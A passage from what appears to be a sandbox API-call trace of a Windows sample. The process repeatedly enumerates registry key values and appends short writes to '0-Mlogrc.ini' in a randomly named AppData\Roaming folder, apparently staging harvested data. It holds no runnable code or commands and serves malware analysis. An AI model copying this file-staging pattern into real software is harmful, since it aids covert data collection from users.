Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.748] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.748] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.748] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0xc, ByteOffset=0x19d600*=426, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.748] NtClose (Handle=0xbc) returned 0x0 [0239.749] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.749] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.750] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.750] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.750] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x52, ByteOffset=0x19d600*=438, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.750] NtClose (Handle=0xbc) returned 0x0 [0239.751] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.751] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.751] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0239.751] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.751] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0239.751] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x12, ByteOffset=0x19d600*=520, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0239.751] NtClose (Handle=0xbc) returned 0x0 [0239.856] RtlIntegerToChar (in: Value=0xda8bfb39, Base=0x0, Length=0x20, String=0x19d6e8 | out: String="3666606905") returned 0x0 [0239.856] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.856] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.387] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.387] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.387] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=538, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.390] NtClose (Handle=0xbc) returned 0x0 [0243.392] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.392] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.393] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.393] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.393] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1a, ByteOffset=0x19d600*=562, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.393] NtClose (Handle=0xbc) returned 0x0 [0243.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.396] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.396] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.396] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.396] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x22, ByteOffset=0x19d600*=588, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.396] NtClose (Handle=0xbc) returned 0x0 [0243.397] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.397] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.398] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.398] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.398] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1a, ByteOffset=0x19d600*=622, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.398] NtClose (Handle=0xbc) returned 0x0 [0243.399] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.399] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.399] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.399] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.400] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x10, ByteOffset=0x19d600*=648, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.400] NtClose (Handle=0xbc) returned 0x0 [0243.401] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.401] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.401] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.401] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.401] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.401] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0xc, ByteOffset=0x19d600*=664, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.401] NtClose (Handle=0xbc) returned 0x0 [0243.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.402] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.402] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.402] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.402] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x22, ByteOffset=0x19d600*=676, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.403] NtClose (Handle=0xbc) returned 0x0 [0243.403] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.403] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.403] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.404] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.404] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.404] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=710, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.405] NtClose (Handle=0xbc) returned 0x0 [0243.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.406] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.406] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.406] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.406] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1e, ByteOffset=0x19d600*=734, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.406] NtClose (Handle=0xbc) returned 0x0 [0243.407] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.407] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.407] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.407] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.407] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=764, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.407] NtClose (Handle=0xbc) returned 0x0 [0243.409] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.409] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.409] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.409] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.409] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x20, ByteOffset=0x19d600*=788, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.409] NtClose (Handle=0xbc) returned 0x0 [0243.410] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.410] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.410] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.410] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.410] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.410] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x14, ByteOffset=0x19d600*=820, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.410] NtClose (Handle=0xbc) returned 0x0 [0243.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.413] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0xbc, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.413] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.413] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.413] NtWriteFile (in: FileHandle=0xbc, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x22, ByteOffset=0x19d600*=840, Key=0x0 | out: IoStatusBlock=0x19d690, 